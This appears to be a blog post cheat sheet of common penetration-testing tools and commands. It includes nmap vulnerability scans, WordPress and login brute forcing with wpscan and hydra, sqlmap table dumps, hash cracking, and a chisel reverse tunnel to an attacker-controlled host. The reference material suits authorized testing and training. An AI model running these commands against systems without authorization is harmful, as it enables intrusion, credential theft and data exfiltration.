Pentesting Tools
Pentesting Tools
This document provides an overview of some essential tools and commands used in penetration testing. Each tool is briefly explained along with typical commands for common scenarios. It is important to note that each tool has many more commands and ways to be used, depending on the situation and the approach you want to take.
PENTESTING TOOLS & COMMANDS
PRIVILEGE ESCALATION COMMANDS
find
- Purpose: Search for files with specific permissions or names.
- Commands:
1 2
find / -perm -4000 2>/dev/null find / -type f -name "flag*.txt" 2>/dev/null
Escalating Privileges with Capabilities
- Purpose: Use Linux capabilities to escalate privileges (if permitted).
- Command:
1
getcap -r / 2>/dev/null
SCANNING FOR VULNERABILITIES
Nmap
- Purpose: Discover open ports, services, and vulnerabilities.
- Commands:
1 2 3 4 5
nmap -sV --script=http-shellshock --script-args uri=/cgi-bin/test.cgi <IP> nmap --script=http-vuln* -p 80 <IP> nmap -p- --open -sS --min-rate 5000 -n -Pn <IP> -oG allPorts -vvv nmap -p<PORT> -sCV nmap --script smb-vuln-ms17-010 -p445 <IP>
WEB APPLICATION TESTING TOOLS
WPScan
- Purpose: Analyze WordPress sites for vulnerabilities.
- Commands:
1 2 3 4 5
wpscan --url <URL> -e vp --api-token <API-TOKEN> # Finding Vulnerabilities wpscan --url <URL> --enumerate u #Finding users wpscan --url <URL> --passwords <PASSWORD_LIST> --usernames <USERNAME_LIST> # Bruteforce wpscan --url <URL> -U <USER> -P <DICTIONARY> wpscan --url <URL>/wordpress -e vt,vp --plugins-detection aggressive --api-token <API-TOKEN>
Joomla Scan
- Purpose: Analyze Joomla websites for vulnerabilities.
- Command:
1
perl joomscan.pl -u <URL>
Droopescan
- Purpose: Scan Drupal websites for vulnerabilities.
- Tool Link: Droopescan GitHub
WhatWeb
- Purpose: Identify technologies used by a website.
- Command:
1
whatweb <URL>
NETWORK ANALYSIS TOOLS
SNMPWalk
- Purpose: Query network devices via SNMP.
- Command:
1
snmpwalk -v2c -c public <IP>
Dig
- Purpose: Perform DNS lookups and reverse DNS resolution.
- Command:
1
dig @<IP> -x <IP>
EXPLOIT DEVELOPMENT TOOLS
SearchSploit
- Purpose: Search for publicly available exploits.
- Command:
1
searchsploit <exploit_name>
SQLMap
- Purpose: Automate SQL injection testing.
- Commands:
1 2 3 4
sqlmap -r <request_file> --dbs sqlmap -r <request_file> -D <DB_NAME> --tables sqlmap -r <request_file> -D <DB_NAME> -T <TABLE_NAME> --dump sqlmap -u <URL> --form --dbs --batch
FILE AND DATA EXTRATION TOOLS
Stegseek
- Purpose: Perform brute-force attacks on steganographic files.
- Command:
1
stegseek -sf <file.jpg> <dictionary>
Steghide
- Purpose: Extract hidden data from images or files.
- Command:
1
steghide extract -sf <file.jpg>
GPG
- Purpose: Decrypt files encrypted with PGP.
- Commands:
1 2
gpg --import priv.key gpg --output <OUTPUT_FILE> --decrypt <INPUT_FILE.gpg>
BRUTE FORCE TOOLS
Hydra
- Purpose: Perform brute-force attacks on login forms.
- Commands:
1
hydra -l <USER> -P <WORDLIST> <IP> http-post-form "/login.php:username=^USER^&password=^PASS^:incorrect" -t 64 -F
DIRECTORY AND SUBDOMAINS ENUMERATION TOOLS
FFUF
- Purpose: Discover subdomains or hidden directories.
- Command:
1
ffuf -u http://<URL>/ -w <WORDLIST> -H "Host: FUZZ.<URL>" -fw 522
Gobuster
- Purpose: Enumerate subdomains and directories.
- Commands:
1
gobuster vhost -u http://<URL> --append-domain -w <WORDLIST> -r
Dirsearch
- Purpose: Identify hidden directories.
- Command:
1
dirsearch -u <URL>
MISCELLANEOUS TOOLS
Chisel
- Purpose: Perform port forwarding.
- Commands:
1 2
chisel server -p 8000 --reverse chisel client <ATTACKER_IP>:8000 R:<LOCAL_PORT>:127.0.0.1:<REMOTE_PORT>
Ltrace
- Purpose: Trace dynamic library calls made by a program.
Feroxbuster
- Purpose: Perform recursive directory scans.
- Command:
1
feroxbuster -u <URL> -w <WORDLIST> -d 0 -t 100
Hashcat and HashID
- Purpose: Identify hash types and perform brute-force attacks on hashes.
- Commands:
1 2 3
hashid <hash> hashcat -a 0 <hash> <WORDLIST> hashcat -a 3 <hash> 'custom_format' -m <MODE>
This post is licensed under CC BY 4.0 by the author.